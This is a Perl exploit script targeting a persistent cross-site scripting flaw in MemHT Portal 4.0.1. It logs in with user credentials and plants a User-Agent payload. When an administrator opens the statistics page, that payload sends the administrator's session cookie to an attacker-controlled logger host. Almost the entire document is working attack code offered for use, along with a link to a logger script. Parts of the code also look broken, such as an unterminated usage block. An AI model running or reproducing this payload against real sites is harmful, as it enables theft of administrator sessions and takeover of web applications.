#!/usr/bin/perl # MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability [user agent] # by ZonTa - zontahackers[at]gmail[dot]com # # After successful inject wait for the admin to view statistic page. # Fix is available : http://www.memht.com/news_149_MemHT-Portal-4-0-2.html
use Getopt::Std; use Digest::MD5('md5_hex'); use LWP::UserAgent;
my ($host,$id,$username,$password,$logger) = @ARGV; my $http = new LWP::UserAgent; my $u_agent = "]\"</td></tr><BODY ONLOAD=document.location=\"http://$logger?cookie=\"+document.cookie+\"&redirect=http://$host\">"; my $cookies = "login_user=$id#".md5_hex($username)."#".md5_hex($password);
package Main;
sub Exploit { if (@ARGV != 5) { Main::Usage(); } else { HTTP::UserAgent($u_agent); MemHT::Login(); } }
sub Usage { return print <<EOF; +-------------------------------------------------------------------+ | MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability | +-------------------------[user agent]------------------------------+
by ZonTa - zontahackers[at]gmail[dot]com Usage: perl exploit.pl host/path userId user pass logger[OPTIONS]
host: target host and memht path userId: user id user: valid username pass: valid password logger: PHP loging file Example: perl exploit.pl localhost/memht 2 foo secret
Download Logger.php -> http://pastebin.com/K6E9AWrC
package MemHT; sub Login { HTTP::Cookies($cookies); my $response = HTTP::GET($host.'/index.php?page=pvtmsg&op=newMessage'); if ($response->content =~ /access denied/i) { print "Login Failed!\n"; exit; } else { print "Logged In!\n"; print "XSS injected !"; } }
package HTTP;
sub UserAgent { return $http->agent($_[0]); }
sub Cookies { return $http->default_header('Cookie' => $_[0]); } sub GET { if ($_[0] !~ m{^http://(.+?)$}i) { return $http->get('http://'.$_[0]); } else { return $http->get($_[0]); } } sub POST { if ($_[0] !~ m{^http://(.+?)$}i) { return $http->post('http://'.$_[0]); } else { return $http->post($_[0]); } } sub http_header { return $http->default_header($_[0]); }
# Greetz to Sri Lankans